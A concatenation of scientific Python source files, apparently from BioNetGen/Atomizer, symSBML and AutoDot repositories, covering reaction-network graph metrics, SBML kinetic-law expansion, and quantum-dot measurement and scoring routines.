speciesAnnotations = annotationExtractor.getAnnotationSystem()
#print speciesAnnotations
speciesAnnotations = set([z for x in speciesAnnotations for y in speciesAnnotations[x] for z in speciesAnnotations[x][y]])
modelAnnotationsCounter.update(speciesAnnotations)
print modelAnnotationsCounter.most_common(20)
def constructPlots(atomizationDB):
"""
Given a pandas data frame object it creates a series of histogram and kde plots describing the characteristics of a set of atomized
models
"""
constructHistogram(atomizationDB['syndel'], '{0}/syndelHist.png'.format(outputDir), 'Fraction of non syn-del reactions', 'Number of models')
constructHistogram(atomizationDB['yild'], '{0}/yieldHist.png'.format(outputDir), 'Yield score', 'Number of models')
constructHistogram(atomizationDB['score'], '{0}/atomizationHist.png'.format(outputDir), 'Percentage of reactions with mechanistic processes', 'Number of models')
create2DdensityPlot(atomizationDB, ['score', 'yild'], ['Atomization score', 'Yield score'], '{0}/atomizationvsyield.png'.format(outputDir))
create2DdensityPlot(atomizationDB, ['syndel', 'yild'], ['Percentage or non-syndel reactions', 'Yield score'], '{0}/syndelvsyield.png'.format(outputDir))
#createHexBin(atomizationDB, ['syndel', 'yild'], ['Percentage or non-syndel reactions', 'Yield score'], '{0}/syndelvsyieldhex.png'.format(outputDir))
if __name__ == "__main__":
folder = 'curated'
# calculate atomization information
atomizationDB = reactionBasedAtomizationDistro(folder)
atomizationDB.to_hdf('{0}DB.h5'.format(folder),'atomization')
outputDir = 'testCurated'
# read info
#atomizationDB = pandas.read_hdf('{0}DB.h5'.format(folder), 'atomization')
# construct plots
#constructPlots(atomizationDB)
#testSet = list(atomizationDB.query('(yild < 0.6) & (syndel > 0.8)').index)
#testSet = ['XMLExamples/{0}'.format(x[:-4]) for x in testSet]
#print extractAnnotationsFromModelSet(testSet)
```
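The per-model metrics computed above reduce to simple ratios; a worked toy example (all counts are invented for illustration):
```python
# Toy counts for one model (illustrative only).
n_rules = 20               # total rules in the model
weight = 15                # rules that are not pure synthesis/degradation
atomized_processes = 12    # of those, rules carrying a mechanistic action
active, structured = 8, 6  # active molecules, and those with components

score = atomized_processes * 1.0 / weight        # 0.80
yield_value = structured * 1.0 / active          # 0.75
syndel = 1 - (n_rules - weight) * 1.0 / n_rules  # 0.75

print(score, yield_value, syndel)
```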
#### File: source_Atomizer/stats/graphAnalysis.py
```python
import networkx as nx
from networkx.algorithms import bipartite
import numpy as np
import pandas
import os
import fnmatch
import sys
import yaml
import scipy
sys.path.insert(0, '.')
sys.path.insert(0, os.path.join('.','SBMLparser'))
#import SBMLparser.utils.consoleCommands as consoleCommands
import concurrent.futures
import multiprocessing as mp
import progressbar
import argparse
import os.path
def loadGraph(graphname):
"""
load GML file as a digraph object from a filename
"""
graph = nx.read_gml(graphname)
return graph
def getFiles(directory,extension,abspath=False):
"""
Gets a list of <extension> files that could be correctly translated in a given 'directory'
Keyword arguments:
directory -- The directory we will recursively get files from
extension -- A file extension filter
"""
matches = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, '*.{0}'.format(extension)):
filepath = os.path.join(root, filename)
if abspath:
filepath = os.path.abspath(filepath)
matches.append([filepath,os.path.getsize(os.path.join(root, filename))])
#sort by size
#matches.sort(key=lambda filename: filename[1], reverse=False)
matches = [x[0] for x in matches]
return matches
from collections import Counter
class ProcessGraph:
"""
creates a pandas dataframe from a gml file containing several graph metrics
like centrality and wiener index
"""
def __init__(self,graph):
self.graph = graph
graphics = {x:self.graph.node[x]['graphics']['type'] for x in self.graph.node}
#print {x:self.graph.node[x]['graphics'] for x in self.graph.node}
self.nodes = pandas.DataFrame.from_dict(self.graph.node,orient='index')
self.nodes['graphics'] = pandas.Series(graphics)
self.nodes['graphics'] = self.nodes['graphics'].map({'roundrectangle': 'species', 'hexagon': 'process'})
def entropy(self,dist):
"""
Returns the entropy of `dist` in bits (base-2), normalized by log2(len(dist)) so a uniform distribution scores 1.
"""
dist = np.asarray(dist)
ent = np.nansum( dist * np.log2( 1/dist ) )/np.log2(len(dist))
return ent
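# Worked example: a uniform distribution maximizes the normalized entropy,
# e.g. entropy([0.25, 0.25, 0.25, 0.25]) == 1.0, while a strongly peaked
# distribution such as [0.97, 0.01, 0.01, 0.01] yields roughly 0.12.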
def centrality_distribution(self,node_type):
"""
Returns a centrality distribution.
Each normalized centrality is divided by the sum of the normalized
centralities. Note, this assumes the graph is simple.
"""
centrality = self.nodes[self.nodes.graphics == node_type]['degree'].values
centrality = np.asarray(centrality)
centrality /= centrality.sum()
return centrality
def removeContext(self):
context2 = []
context3 = []
edges = self.graph.edges(data=True)
for source,destination,data in edges:
if 'graphics' in data:
if data['graphics']['fill'] == u'#798e87':
context2.append((source,destination))
else:
for idx in data:
if 'graphics' in data[idx]:
if data[idx]['graphics']['fill'] == u'#798e87':
context3.append((source,destination,idx))
self.graph.remove_edges_from(context2)
self.graph.remove_edges_from(context3)
def wiener(self):
g2 = nx.Graph(self.graph)
speciesnodes = set(n for n, d in self.graph.nodes(data=True) if d['graphics']['type']=='roundrectangle')
wienerIndex = []
connected = 0
for node1 in speciesnodes:
wiener = 0
for node2 in speciesnodes:
if node1 == node2:
continue
try:
wiener += len(nx.shortest_path(g2,node1,node2)) - 1
connected += 1
except nx.exception.NetworkXNoPath:
continue
wienerIndex.append(wiener)
if connected ==0:
return 0,1
return sum(wienerIndex)*1.0/connected,self.entropy(np.asarray(wienerIndex)*1.0/sum(wienerIndex))
def graphMeasures(self):
"""
calculates several graph measures
"""
#average_degree_connectivity = nx.average_degree_connectivity(self.graph)
#average_neighbor_degree = nx.average_neighbor_degree(self.graph)
average_node_connectivity = nx.average_node_connectivity(self.graph)
#average_node_connectivity = 1
return [average_node_connectivity]
def centrality(self):
"""
calculates several measures of node centrality and stores them in the general node table
"""
speciesnodes = set(n for n, d in self.graph.nodes(data=True) if d['graphics']['type']=='roundrectangle')
g2 = nx.Graph(self.graph)
self.nodes['degree'] = pandas.Series(nx.degree_centrality(self.graph))
self.nodes['closeness'] = pandas.Series(nx.closeness_centrality(self.graph))
self.nodes['betweenness'] = pandas.Series(nx.betweenness_centrality(self.graph))
self.nodes['communicability'] = pandas.Series(nx.communicability_centrality(g2))
#print self.nodes.sort(column='load',ascending=False).head(20)
#
def generateGraph(bngfile,timeout=180,graphtype='regulatory',options = []):
"""
Generates a bng-xml file via the bng console
"""
#consoleCommands.generateGraph(bngfile,graphtype,options)
graphname = '.'.join(bngfile.split('.')[:-1]) + '_{0}.gml'.format(graphtype)
graphname = graphname.split('/')[-1]
return graphname
def getGraphEntropy(graphname,nodeType):
"""
given a filename pointing to a gml file it will return a series of metrics describing
the properties of the graph
"""
#try:
graph = loadGraph(graphname)
process = ProcessGraph(graph)
#process.removeContext()
try:
process.centrality()
dist = process.centrality_distribution(node_type=nodeType)
centropy = process.entropy(dist)
#centropy = 1
except ZeroDivisionError:
centropy = 1
#print process.wiener()
#return graphname,nodeType,process.wiener(),centropy,process.graphMeasures(),
#[len(process.nodes[process.nodes.graphics =='process']),len(process.nodes[process.nodes.graphics=='species']),len(graph.edges)]
return {'graphname':graphname,'nodeType':nodeType,
'wiener':process.wiener(),'centropy':centropy,
'measures': process.graphMeasures(),
'graphstats':[len(process.nodes[process.nodes.graphics =='process']),len(process.nodes[process.nodes.graphics=='species']),len(graph.edges())]
}
#except:
# return graphname,nodeType,-1
import shutil
def createGMLFiles(directory,options):
bngfiles= getFiles(directory,'bngl')
for bngfile in bngfiles:
for option in options:
graphname = generateGraph(bngfile,options = options[option])
shutil.move(graphname, os.path.join(directory,option))
def defineConsole():
parser = argparse.ArgumentParser(description='SBML to BNGL translator')
parser.add_argument('-s','--settings',type=str,help='settings file')
parser.add_argument('-o','--output',type=str,help='output directory')
return parser
def loadFilesFromYAML(yamlFile):
with open(yamlFile,'r') as f:
yamlsettings = yaml.load(f)
print yamlsettings
return yamlsettings
def getEntropyMeasures(graphnames):
"""
batch process returns a distribution of metrics for fileset <graphnames>
"""
futures = []
workers = mp.cpu_count()-1
results = pandas.DataFrame()
with concurrent.futures.ProcessPoolExecutor(max_workers=workers) as executor:
for gidx in range(len(graphnames)):
futures.append(executor.submit(getGraphEntropy,graphnames[gidx],'species'))
for future in concurrent.futures.as_completed(futures,timeout=3600):
partialResults = future.result()
row = partialResults['graphname'].split('/')[-1]
column = partialResults['graphname'].split('/')[-3]
results = results.set_value(row,column + '_wiener',partialResults['wiener'][0])
results = results.set_value(row,column + '_entropy',partialResults['wiener'][1])
results = results.set_value(row,column + '_ccentropy',partialResults['centropy'])
results = results.set_value(row,column + '_nconn',partialResults['measures'][0])
results = results.set_value(row,column + '_nprocess',partialResults['graphstats'][0])
results = results.set_value(row,column + '_nspecies',partialResults['graphstats'][1])
results = results.set_value(row,column + '_nedges',partialResults['graphstats'][2])
return results
if __name__ == "__main__":
parser = defineConsole()
namespace = parser.parse_args()
if namespace.settings != None:
settings = loadFilesFromYAML(namespace.settings)
graphnames = settings['inputfiles']
outputdirectory = namespace.output
outputfile = 'entropy_{0}.h5'.format(namespace.settings.split('/')[-1].split('.')[-2])
else:
graphnames = getFiles('egfr/collapsed_contact','gml')
outputdirectory = 'egfr'
outputfile = 'entropy_test.h5'
#bngfile = 'egfr_net.bngl'
#createGMLFiles('egfr',options)
nodeTypes = ['species','process']
results = getEntropyMeasures(graphnames)
results.to_hdf(os.path.join(outputdirectory,outputfile),'entropy')
#raise Exception
```
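A usage sketch for the graph-metric pipeline above, assuming `model_regulatory.gml` is a regulatory graph exported by BioNetGen (the file name is a placeholder):
```python
from graphAnalysis import getGraphEntropy

metrics = getGraphEntropy('model_regulatory.gml', 'species')  # hypothetical GML file
avg_wiener, wiener_entropy = metrics['wiener']
print(metrics['centropy'])    # entropy of the species degree-centrality distribution
print(metrics['graphstats'])  # [process nodes, species nodes, edges]
```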
#### File: BioNetGen-2.2.6-stable/SBMLparser/updateDistribution.py
```python
from os import listdir
import os.path
import shutil
import json
import argparse
import os
def defineConsole():
parser = argparse.ArgumentParser(description='SBMLparser file copy script')
parser.add_argument('-c','--copy',action='store_true',help='copy files from the main distro')
parser.add_argument('-r','--remove',action='store_true',help='remove files from this directory')
return parser
fileList = []
def resource_path(relative_path):
base_path = os.path.abspath(".")
convertedPath = os.path.normpath(os.path.join(base_path, relative_path))
return convertedPath
def clean_directory():
'''
with open('fileList.json','r') as f:
onlyfiles = json.load(f)
for fileName in onlyfiles:
try:
os.remove(fileName)
except OSError:
continue
'''
shutil.rmtree(os.path.join('.','SBMLparser'))
def update_directory():
srcDirectory = resource_path(os.path.join('..','..','parsers','SBMLparser','SBMLparser'))
'''
with open('fileList.json','r') as f:
onlyfiles = json.load(f)
#onlyfiles = [ f for f in listdir('./' + directory) if os.path.isfile(os.path.join('./' + directory,f)) ]
configFiles = [ f for f in listdir(os.path.join('.','config')) if os.path.isfile(os.path.join('.','config',f)) ]
#onlyNotFiles =[ f for f in listdir('./' + directory) if not isfile(join('./' + directory,f)) ]
originalFiles = listdir(srcDirectory)
print onlyfiles
for element in onlyfiles:
if element in originalFiles:
try:
shutil.copy(os.path.join(srcDirectory, element), '.')
except:
continue
for element in configFiles:
shutil.copy(os.path.join(srcDirectory,'config',element), os.path.join('.','config'))
'''
configFiles = [ f for f in listdir(os.path.join('.','config')) if os.path.isfile(os.path.join('.','config',f)) ]
for element in configFiles:
shutil.copy(os.path.join(srcDirectory,'config',element), os.path.join('.','config'))
try:
shutil.copytree(os.path.join(srcDirectory), 'SBMLparser')
except OSError:
print('SBMLparser directory already exists')
if __name__ == "__main__":
parser = defineConsole()
namespace = parser.parse_args()
if namespace.copy:
update_directory()
elif namespace.remove:
clean_directory()
``` |
{
"source": "joseph-hellerstein/symSBML-deprecated",
"score": 3
} |
#### File: symSBML-deprecated/symSBML/kinetic_law.py
```python
from src.common import constants as cn
from src.common import util
from src.common import exceptions
from src.common import msgs
import collections
import numpy as np
import re
MAX_RECURSION = 5
class KineticLaw(object):
def __init__(self, libsbml_kinetics, reaction, function_definitions=None):
"""
:param libsbml.KineticLaw libsbml_kinetics:
:param function_definitions list-FunctionDefinition:
"""
# libsbml object for kinetics
self.libsbml_kinetics = libsbml_kinetics
# String version of chemical formula
self.formula = self.libsbml_kinetics.getFormula()
# Parameters and chemical species
self.symbols = self._getSymbols()
# Reaction for the kinetics law
self.reaction = reaction
# Expanded kinetic formula (remove embedded functions)
if function_definitions is None:
self.expanded_formula = None
else:
self.expandFormula(function_definitions)
self.expression_formula = None # valid symPy expression string
def __repr__(self):
return self.formula
def expandFormula(self, function_definitions):
"""
Expands the kinetics formula, replacing function definitions
with their body.
Parameters
----------
function_definitions: list-FunctionDefinition
"""
self.expanded_formula = self._expandFormula(self.formula, function_definitions)
def mkSymbolExpression(self, function_definitions):
"""
Creates a string that can be processed by sympy.
Parameters
-------
function_definitions: list-FunctionDefinition
Returns
-------
str
"""
if self.expanded_formula is None:
self.expandFormula(function_definitions)
self.expression_formula = str(self.expanded_formula)
        self.expression_formula = self.expression_formula.replace('^', '**')
        return self.expression_formula
@staticmethod
def _expandFormula(expansion, function_definitions,
num_recursion=0):
"""
Expands the kinetics formula, replacing function definitions
with their body.
Parameters
----------
expansion: str
expansion of the kinetic law
function_definitions: list-FunctionDefinition
num_recursion: int
Returns
-------
str
"""
if num_recursion > MAX_RECURSION:
return expansion
done = True
for fd in function_definitions:
# Find the function calls
calls = re.findall(r'{}\(.*?\)'.format(fd.id), expansion)
if len(calls) == 0:
continue
done = False
for call in calls:
# Find argument call. Ex: '(a, b)'
call_arguments = re.findall(r'\(.*?\)', call)[0]
call_arguments = call_arguments.strip()
call_arguments = call_arguments[1:-1] # Eliminate parentheses
arguments = call_arguments.split(',')
arguments = [a.strip() for a in arguments]
body = str(fd.body)
for formal_arg, call_arg in zip(fd.argument_names, arguments):
body = body.replace(formal_arg, call_arg)
expansion = expansion.replace(call, body)
if not done:
return KineticLaw._expandFormula(expansion, function_definitions,
num_recursion=num_recursion+1)
return expansion
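    # Illustrative trace (hypothetical FunctionDefinition fd with id 'f',
    # argument_names ['a', 'b'] and body 'a*b'):
    # _expandFormula('k1 * f(S1, S2)', [fd])  ->  'k1 * S1*S2'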
def _getSymbols(self):
"""
Finds the parameters and species names for the
kinetics law. Exposing this information requires
a recursive search of the parse tree for the
kinetics expression.
:return list-str:
"""
global cur_depth
MAX_DEPTH = 20
cur_depth = 0
def augment(ast_node, result):
global cur_depth
cur_depth += 1
if cur_depth > MAX_DEPTH:
raise exceptions.BadKineticsMath(self.reaction.id)
            for idx in range(ast_node.getNumChildren()):
                child_node = ast_node.getChild(idx)
                if child_node.getName() is None:
                    # augment mutates result in place; extending result with
                    # its own return value would duplicate every entry
                    augment(child_node, result)
                else:
                    if child_node.isFunction():
                        augment(child_node, result)
                    else:
                        result.append(child_node.getName())
            return result
ast_node = self.libsbml_kinetics.getMath()
if ast_node.getName() is None:
result = []
else:
result = [ast_node.getName()]
return augment(ast_node, result)
``` |
{
"source": "josephhic/AutoDot",
"score": 2
} |
#### File: AutoDot/Investigation/condition_functions.py
```python
import scipy.signal as signal
import pickle
import numpy as np
from .scoring.Last_score import final_score_cls
from skimage.feature import blob_log
import time
import matplotlib.pyplot as plt  # needed by plot_image_and_blobs below
def mock_peak_check(anchor,minc,maxc,configs,**kwags):
a = configs.get('a',None)
b = configs.get('b',None)
verb = configs.get('verbose',False)
if a is None and b is None:
prob = configs.get('prob',0.5)
c_peak = np.random.uniform(0,1)<prob
if verb: print(c_peak)
return c_peak, c_peak, None
lb, ub = np.minimum(a,b), np.maximum(a,b)
c_peak = np.all(anchor<ub) and np.all(anchor>lb)
if verb: print(c_peak)
return c_peak, c_peak, None
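# Illustrative call (all numbers made up): with a=[-1000,-1000] and b=[0,0]
# the check passes only when every coordinate of anchor lies inside the box.
# mock_peak_check(np.array([-500, -500]), None, None,
#                 {'a': [-1000, -1000], 'b': [0, 0], 'verbose': True})  # -> (True, True, None)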
def mock_score_func(anchor,minc,maxc,configs,**kwags):
a = np.array(configs.get('target',[-500,-500]))
score = 100/ np.linalg.norm(a-anchor)
print(score)
return score, False, None
def check_nothing(trace,minc,maxc,configs,**kwags):
output = configs.get('output',False)
return output, output, None
def peak_check(trace,minc,maxc,configs,**kwags):
prominence = configs['prominance']
#norm settings
offset = minc
maxval = maxc
#peak detector settings
height = configs.get('height',0.0178)
trace_norm=trace.copy()-offset
trace_norm[trace_norm<0]=0
trace_norm = (trace_norm)/((maxval-offset)) #normalize the current amplitude
peaks, data = signal.find_peaks(trace_norm,prominence=prominence,height=height)
return len(peaks)>=configs['minimum'], len(peaks)>=configs['minimum'], peaks
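# Sketch of the configs dict this function expects (note the key really is
# spelled 'prominance' in this codebase; the values are illustrative):
# configs = {'prominance': 0.02, 'height': 0.0178, 'minimum': 2}
# found, cond, peaks = peak_check(trace, trace.min(), trace.max(), configs)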
def reduce_then_clf_2dmap(data,minc,maxc,configs,**kwags):
dim_reduction_fname = configs['dim_reduction']
clf_fname = configs['clf']
with open(dim_reduction_fname,'rb') as drf:
dim_red = pickle.load(drf)
with open(clf_fname,'rb') as cf:
clf = pickle.load(cf)
X = normilise(data,configs['norm'],minc,maxc)
X_red = dim_red.transform(np.expand_dims(X,axis=0))
Y = np.squeeze(clf.predict(X_red))
return Y, Y, None
def last_score(data,minc,maxc,configs,**kwags):
fsc = final_score_cls(minc,maxc,configs['noise'],configs['segmentation_thresh'])
score = getattr(fsc,configs.get('mode','score'))(data,diff=configs.get('diff',1))
s_cond = False
print("Score: %f"%score)
return score, s_cond, None
def last_score_then_blob(data,minc,maxc,configs,**kwags):
fsc = final_score_cls(minc,maxc,configs['noise'],configs['segmentation_thresh'])
score = getattr(fsc,configs.get('mode','score'))(data,diff=configs.get('diff',1))
score_thresh = configs.get('score_thresh',None)
if score_thresh is None:
score_thresh = kwags.get('score_thresh')
print("Score: %f"%score)
blobs = blob_detect_rough(data,minc,maxc)
return score, score>score_thresh, {"kwags":{"blobs":blobs,"size_last":configs['size'],"res_last":configs['res']}}
def clf_then_blob(data,minc,maxc,configs,**kwags):
data = normilise(data,configs['norm'],minc,maxc)
clf_fname = configs['clf']
with open(clf_fname,'rb') as cf:
clf = pickle.load(cf)
Y = np.squeeze(clf.predict(np.expand_dims(data,axis=0)))
    # completed to mirror last_score_then_blob above (assumed intent): run
    # blob detection only when the classifier fires
    if Y:
        blobs = blob_detect_rough(data, minc, maxc)
        return Y, Y, {"kwags": {"blobs": blobs, "size_last": configs['size'], "res_last": configs['res']}}
    return Y, Y, None
def count_above_thresh(data,minc,maxc,configs,**kwags):
split_thresh = configs.get('split_thresh',0.0001)
count_required = configs.get('count_required',0.0001)
data_above = data[data>split_thresh]
count_ratio = data_above.size/data.size
blobs = blob_detect_rough(data,minc,maxc)
return count_ratio<count_required,count_ratio<count_required,{"kwags":{"cr":count_ratio,"blobs":blobs,"size_last":configs['size'],"res_last":configs['res']}}
def blob_detect_rough(data,minc,maxc):
blobs = blob_log(normilise(data,'device_domain',minc,maxc),min_sigma=2,threshold=0.0001)[:,:2]
return np.array([blobs[:,1],blobs[:,0]])
def normilise(data,norm_type,minc,maxc):
if norm_type is None:
return data
if isinstance(norm_type,list):
min_val = norm_type[0]
max_val = norm_type[1]
elif norm_type == 'device_domain':
min_val = minc
max_val = maxc
else:
min_val = data.min()
max_val = data.max()
data_norm = np.copy(data)
data_norm[data_norm>max_val] = max_val
data_norm[data_norm<min_val] = min_val
data_norm = (data_norm - min_val)/(max_val-min_val)
return data_norm
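# normilise supports three conventions (example values are illustrative):
# normilise(data, [0.0, 1e-9], minc, maxc)      # explicit [min, max] window
# normilise(data, 'device_domain', minc, maxc)  # clip to the device current range
# normilise(data, 'data_range', minc, maxc)     # any other value: use the data's own min/max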
def plot_image_and_blobs(data,blobs):
blob = blobs[:,:2]
blob = np.array([blob[:,1],blob[:,0]])
plt.imshow(data)
for i in range(blob.shape[-1]):
plt.scatter(*blob[:,i])
plt.show()
```
#### File: AutoDot/Investigation/measurement_functions.py
```python
import numpy as np
import matplotlib.pyplot as plt
import time
def do_nothing(jump,measure,anchor_vals,configs,**kwags):
pause = configs.get('pause',0)
time.sleep(pause)
return None
def mock_measurement(jump,measure,anchor_vals,configs,**kwags):
pause = configs.get('pause',0)
time.sleep(pause)
return anchor_vals
def do1dcombo(jump,measure,anchor_vals,configs,**kwags):
size = configs.get('size',128)
direction = np.array(configs.get('direction',[1]*len(anchor_vals)))
res = configs.get('res',128)
delta_volt = np.linspace(0,size,res)
anchor_vals = np.array(anchor_vals)
trace = combo1d(jump,measure,anchor_vals,delta_volt,direction)
if configs.get('plot',False):
plt.plot(delta_volt,trace)
plt.show()
return trace
def do2d(jump,measure,anchor_vals,configs,**kwags):
bound = kwags.get('bound',configs['size'])
res = configs.get('res',20)
direction = np.array(configs.get('direction',[1]*len(anchor_vals)))
iter_vals = [None]*2
for i in range(2):
iter_vals[i] = np.linspace(0,bound[i],res)
iter_deltas = np.array(np.meshgrid(*iter_vals))
data = np.zeros([res,res])
for i in range(res):
for j in range(res):
params_c = anchor_vals + direction*iter_deltas[:,i,j]
jump(params_c)
data[i,j] = measure()
if configs.get('plot',False):
plt.imshow(data,cmap='bwr')
plt.show()
return data
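# Minimal usage sketch (jump/measure are caller-supplied callables; the
# numbers are hypothetical):
# data = do2d(jump, measure, anchor_vals,
#             {'size': [100, 100], 'res': 20, 'plot': False}, bound=[100, 100])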
def measure_random_blob(jump,measure,anchor_vals,configs,**kwags):
blobs = kwags['last_check'].get('blobs')
old_size = kwags['last_check'].get('size_last')
old_res = kwags['last_check'].get('res_last')
size = configs['size']
res = configs['res']
x_old = np.linspace(0,old_size[0],old_res)
y_old = np.linspace(0,old_size[1],old_res)
try:
random_blob_idx = np.random.choice(blobs.shape[-1])
random_blob = blobs[:,random_blob_idx]
except ValueError:
return None
    random_blob = np.array([x_old[int(random_blob[0])], y_old[int(random_blob[1])]])
anc_new = (anchor_vals - random_blob)+(size/2)
print(anc_new)
configs_new = {'size':[size,size],'res':res,'direction':[-1,-1]}
data = do2d(jump,measure,anc_new,configs_new,**kwags)
if configs.get('plot',False):
plt.imshow(data,cmap='bwr')
plt.show()
return data
def do2_do2d(jump,measure,anchor_vals,configs,**kwags):
pygor = kwags.get('pygor')
if pygor is None:
raise ValueError("Pygor instance was not passed to investigation stage")
var_par = configs['var params']
assert len(var_par)==3
data = []
print(pygor.setvals(var_par[0]['keys'],var_par[0]['params']))
data += [do2d(jump,measure,anchor_vals,configs,**kwags)]
print(pygor.setvals(var_par[1]['keys'],var_par[1]['params']))
time.sleep(60)
data += [do2d(jump,measure,anchor_vals,configs,**kwags)]
print(pygor.setvals(var_par[2]['keys'],var_par[2]['params']))
time.sleep(60)
return np.array(data)
def combo1d(jump,measure,anc,deltas,dirs):
trace = np.zeros(len(deltas))
for i in range(len(deltas)):
params_c = anc + dirs*deltas[i]
jump(params_c)
trace[i] = measure()
return trace
```
#### File: Investigation/scoring/dot_score.py
```python
import numpy as np
import scipy.signal
from Pygor_new.measurement_functions import measurement_funcs as meas
def find_peaks(trace,prominence):
#norm settings
offset = -1.5e-10
maxval = 5e-10
noise_level = 1E-11
#peak detector settings
height = 0.0178
trace_norm=trace.copy()-offset
trace_norm[trace_norm<0]=0
trace_norm = (trace_norm)/((maxval-offset)) #normalize the current amplitude
peaks, data = scipy.signal.find_peaks(trace_norm,prominence=prominence,height=height)
return peaks
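# Illustrative call with a synthetic current trace (numbers made up; the
# offset/maxval constants above assume currents of order 1e-10 A):
# trace = 1e-10 * np.sin(np.linspace(0, 6 * np.pi, 100))
# peaks = find_peaks(trace, prominence=0.02)  # indices of the three maxima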
def dot_score_avg(coor, trace1,trace2,prominence):
peaks1_index = find_peaks(trace1,prominence)
peaks2_index = find_peaks(trace2,prominence)
peaks1_co = coor[peaks1_index] #relative coordinates of the peaks in trace 1
peaks2_co = coor[peaks2_index] #relative coordinates of the peaks in trace 2
diff1 = np.diff(peaks1_co)
diff2 = np.diff(peaks2_co)
if len(diff1)==0 or len(diff2)==0:
dist=np.nan
return dist
peak_avg1=np.convolve(peaks1_co,[0.5, 0.5],'valid')
peak_avg2=np.convolve(peaks2_co,[0.5, 0.5],'valid')
if len(diff1)>len(diff2):
while len(diff1)>len(diff2):
avg_score=[]
for num in peak_avg1:
avg_score+=[min(abs(peak_avg2-num))]
max_avg_index=avg_score.index(max(avg_score))
diff1=np.delete(diff1,[max_avg_index])
peak_avg1=np.delete(peak_avg1,[max_avg_index])
    # symmetric to the branch above: trim excess peaks from trace 2
    if len(diff2)>len(diff1):
        while len(diff2)>len(diff1):
            avg_score=[]
            for num in peak_avg2:
                avg_score+=[min(abs(peak_avg1-num))]
            max_avg_index=avg_score.index(max(avg_score))
            diff2=np.delete(diff2,[max_avg_index])
            peak_avg2=np.delete(peak_avg2,[max_avg_index])
dist = np.linalg.norm(diff1-diff2)/np.sqrt(diff1.size)
return dist
def dot_score_weight(coor, trace1,trace2,prominence,weight):
peaks1_index = find_peaks(trace1,prominence)
peaks2_index = find_peaks(trace2,prominence)
peaks1_co = coor[peaks1_index] #relative coordinates of the peaks in trace 1
peaks2_co = coor[peaks2_index] #relative coordinates of the peaks in trace 2
if len(peaks1_co)<3 or len(peaks2_co)<3:
extra_score=1
return extra_score
else:
peak_avg1=np.convolve(peaks1_co,[0.5, 0.5],'valid')
peak_avg2=np.convolve(peaks2_co,[0.5, 0.5],'valid')
dist_avg1=(np.mean(np.diff(peak_avg1)))
dist_avg2=(np.mean(np.diff(peak_avg2)))
extra_score=2-(abs(dist_avg1-dist_avg2)/max(dist_avg1,dist_avg2))
return extra_score*weight
def execute_score(coor, traces_dir1, traces_dir2, prominence=0.02,weight=1.5):
scores1=[]
scores2=[]
#Scores based on distance difference
for j in range(0,len(traces_dir1),2): #calculate the scores for the the traces in direction 1 and direction 2
score1=dot_score_avg(coor,traces_dir1[j],traces_dir1[j+1],prominence)
score2=dot_score_avg(coor,traces_dir2[j],traces_dir2[j+1],prominence)
print(score1,score2)
#Scores based on extra periodicity weight factor
score_extra1=dot_score_weight(coor,traces_dir1[j],traces_dir1[j+1],prominence,weight)
score_extra2=dot_score_weight(coor,traces_dir2[j],traces_dir2[j+1],prominence,weight)
print(score_extra1,score_extra2)
scores1+=[score1*score_extra1]
scores2+=[score2*score_extra2]
    if np.any(np.isnan(scores1)):
        scores1 = [0]
    if np.any(np.isnan(scores2)):
        scores2 = [0]
print(scores1,scores2)
#nx is the number of x pixels
#ny is the number of y pixels
tot_score = scores1[0] + scores2[0]
return tot_score
def smooth_trace(traces,pad=(1,1),conv=3):
s_traces = []
for trace in traces:
s_traces += [np.convolve(np.lib.pad(trace,pad,'edge'),np.ones((conv,))/conv,mode='valid')]
return s_traces
def dot_score_sample(pygor,params,gates=["c3","c4","c5","c6","c7","c8","c9","c10"],v_gates=["c5","c9"],l=100,s=20,res=100):
def safe_shuffle(varz,vals):
pygor.server.config_control("dac",{'set_settletime': 0.03,'set_shuttle': True})
pygor.setvals(varz,vals)
pygor.server.config_control("dac",{'set_settletime': 0.01,'set_shuttle': False})
safe_shuffle(gates,params)
v1_val,v2_val=pygor.getvals(["c5","c9"])
l_step = (l/2)/np.sqrt(2)
s_step = (s/2)/np.sqrt(2)
tracepoints = np.zeros([4,2])
endpoints = np.zeros([4,2])
    traces = np.zeros([tracepoints.shape[0],res])
tracepoints[0,:] = [v1_val +l_step +s_step ,v2_val +l_step -s_step]
endpoints[0,:] = [v1_val -l_step +s_step, v2_val -l_step -s_step]
tracepoints[1,:] = [v1_val -l_step -s_step, v2_val -l_step +s_step]
endpoints[1,:] = [v1_val +l_step -s_step, v2_val +l_step +s_step]
tracepoints[2,:] = [v1_val -l_step +s_step, v2_val +l_step +s_step]
endpoints[2,:] = [v1_val +l_step +s_step, v2_val -l_step +s_step]
tracepoints[3,:] = [v1_val +l_step -s_step, v2_val -l_step -s_step]
endpoints[3,:] = [v1_val -l_step -s_step, v2_val +l_step -s_step]
for i in range(tracepoints.shape[0]):
safe_shuffle(v_gates,tracepoints[i])
traces[i,:] = meas.do1d_combo(pygor,v_gates,tracepoints[i],endpoints[i],res).data
safe_shuffle(gates,params)
x_vals = np.linspace(0,l,res)
return traces,x_vals,tracepoints,endpoints
def dot_score(pygor,params,gates=["c3","c4","c5","c6","c7","c8","c9","c10"],v_gates=["c5","c9"],l=100,s=20,res=100):
traces,coor,tracepoints,endpoints = dot_score_sample(pygor,params,gates,v_gates,l,s,res)
s_traces = smooth_trace(traces)
s1 = execute_score(coor,s_traces[0:2],s_traces[2:4])
return s1
```
#### File: AutoDot/Playground/shapes.py
```python
import numpy as np
import scipy.stats
def L2_norm(x):
return np.sqrt(np.sum(np.square(x), axis=-1))
class Circle(object):
def __init__(self, ndim, r=1000, origin=0.0):
if np.isscalar(origin):
self.origin = origin * np.ones(ndim)
else:
self.origin = np.array(origin)
self.r = r
self.ndim = ndim
def __call__(self, x):
return L2_norm(np.array(x) - self.origin) <= self.r
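# Example membership test (numbers made up): a 2-D circle of radius 1000
# centred at the origin contains (-500, -500), whose norm is ~707.
# Circle(2, r=1000, origin=0.0)(np.array([-500, -500]))  # -> True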
class Box(object):
def __init__(self, ndim, a=-1000, b=0):
if np.isscalar(a):
a = a * np.ones(ndim)
if np.isscalar(b):
b = b * np.ones(ndim)
a = np.array(a)
b = np.array(b)
if len(a) != ndim or len(b) != ndim:
raise ValueError('Wrong dimensions for defining a box')
if all(a < b):
self.lb, self.ub = a, b
elif all(a > b):
self.lb, self.ub = b, a
else:
raise ValueError('Wrong points for defining a box')
self.ndim = ndim
def __call__(self, x):
x = np.array(x)
inside = np.logical_and(np.all(x > self.lb[np.newaxis, :], axis=-1),
np.all(x < self.ub[np.newaxis, :], axis=-1))
return inside
class Leakage(object):
